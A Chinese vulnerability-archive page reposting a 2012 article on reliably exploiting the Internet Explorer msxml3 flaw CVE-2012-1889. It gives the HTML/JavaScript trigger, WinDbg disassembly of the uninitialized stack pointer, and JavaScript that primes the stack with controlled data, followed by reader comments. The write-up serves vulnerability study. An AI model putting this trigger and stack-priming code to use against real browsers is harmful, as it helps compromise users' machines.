CVE漏洞中文网

0DayBank一个专门收集整理全球互联网漏洞的公开发布网站
  1. 首页
  2. 百科
  3. 正文

暴雷漏洞

2017年5月23日 754点热度 0人点赞 0条评论
  • 首页
  • 分类阅读
  • 文库
  • 专栏
  • 公开课
  • 商城
  • 漏洞盒子
注册 | 登录
投稿

IE漏洞CVE-2012-1889的稳定利用

匿名用户2012-06-18共84895人围观 ,发现 8 个不明物体WEB安全系统安全

MSF的触发代码如下:
触发时的代码如下:

<object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id="xx">
</object>
<script>
document.getElementById("xx").object.definition(0);
</script>
0:015> u 5dd8d7c9  L50
msxml3!_dispatchImpl::InvokeHelper+0x93:
5dd8d7c9 8b45ec          mov     eax,dword ptr [ebp-14h]
5dd8d7cc 3bc3            cmp     eax,ebx
5dd8d7ce 8bf0            mov     esi,eax
5dd8d7d0 7426            je      msxml3!_dispatchImpl::InvokeHelper+0xc2 (5dd8d7f8)
5dd8d7d2 ff7528          push    dword ptr [ebp+28h]
5dd8d7d5 8b08            mov     ecx,dword ptr [eax]
5dd8d7d7 ff7524          push    dword ptr [ebp+24h]
5dd8d7da ff7520          push    dword ptr [ebp+20h]
5dd8d7dd 57              push    edi
5dd8d7de 6a03            push    3
5dd8d7e0 ff7514          push    dword ptr [ebp+14h]
5dd8d7e3 6870a8d85d      push    offset msxml3!GUID_NULL (5dd8a870)
5dd8d7e8 53              push    ebx
5dd8d7e9 50              push    eax
5dd8d7ea ff5118          call    dword ptr [ecx+18h]

其中 5dd8d7c9 8b45ec mov eax,dword ptr [ebp-14h] 中 eax的值来自于栈上,栈上的值未经初始化,被直接用做对象指针后就会出现问题。要稳定利用该漏洞,就需要对eax的值进行控制,只要预先在栈上排布我们要的数据就可以,比如 unescape("%u1111%u1111")。以下代码可以实现该功能:
执行完 pic.nameProp 后,就会在栈上留下0×2000左右大小的可控数据。

var src = unescape("%u1111%u1111");
while (src.length &lt; 0x1002) src += src;
src = "\\\\xxx" + src;
src = src.substr(0, 0x1000 - 10);
var pic = document.createElement("img");
pic.src = src;
pic.nameProp;

相关阅读:暴雷漏洞(CVE-2012-1889)Metasploit利用代码 出自:Inking

匿名用户661 篇文章等级: 3级
|
|
  • 上一篇:[连载]Burp Suite详细使用教程-Intruder模块详解(3)
  • 下一篇:Webshell代码检测背后的数学应用
发表评论

已有 8 条评论

  • phper 2012-06-18回复1楼

    我表示看不懂也不会利用

    亮了(1)
  • baidu 2012-06-18回复2楼

    求高手解读

    亮了(1)
  • obama 2012-06-18回复3楼

    高手

    亮了(1)
  • seaeast (1级) 2012-06-18回复4楼

    看不懂,飘过 :mrgreen:

    亮了(1)
  • zipp0s (1级) 2012-06-19回复5楼

    。

    亮了(1)
  • 匿名用户 2012-06-21回复6楼

    这,,转载人家的也不说明来源。还挂了个自己的链接。这也太。。。

    亮了(1)
    • xsser 2012-06-21回复

      文章最后,您眼神不大好。。

      亮了(2)
      • enaxM (1级) 2017-01-10回复

        @ xsser 一般放开头,放末尾谁看得见啊

        亮了(0)

必须您当前尚未登录。登陆?注册

必须(保密)

表情插图

取消

匿名用户

这是一个神奇的马甲

661 篇文章0 条评论

相关阅读

  • 暴雷漏洞(CVE-2012-1889)Metasploit利用代码
  • 防御XSS的七条原则
  • Offset2lib攻击测试:看我如何全面绕过64位Linux的内核防护
  • 2014互联网金融安全漏洞分析报告
  • Cobalt strike在内网渗透中的使用

特别推荐

关注我们 分享每日精选文章

不容错过

  • Google研究人员宣布完成全球首例SHA-1哈希碰撞!Sphinx2017-02-24
  • 视频:WaRP飞思卡尔可穿戴设备 – CES展会上最酷炫的东西FB视频2014-02-21
  • Splunk大数据分析经验分享:从入门到夺门而逃Porsche2016-12-19
  • KCon大会首日速描:黑客们团结起来ArthurKiller2016-08-27

FREEBUF

  • 免责声明
  • 关于我们
  • 加入我们

广告及服务

  • 寻求报道
  • 广告合作
  • 联系我们
  • 友情链接

关注我们

  • 官方微信
  • 新浪微博
  • 腾讯微博
  • Twitter

赞助商

Copyright © 2013 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号

css.php

正在加载中...

0daybank

标签: 暂无
最后更新:2017年5月23日

小助手

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

您需要 登录 之后才可以评论

COPYRIGHT © 2024 www.pdr.cn CVE漏洞中文网. ALL RIGHTS RESERVED.

鲁ICP备2022031030号

联系邮箱:wpbgssyubnmsxxxkkk@proton.me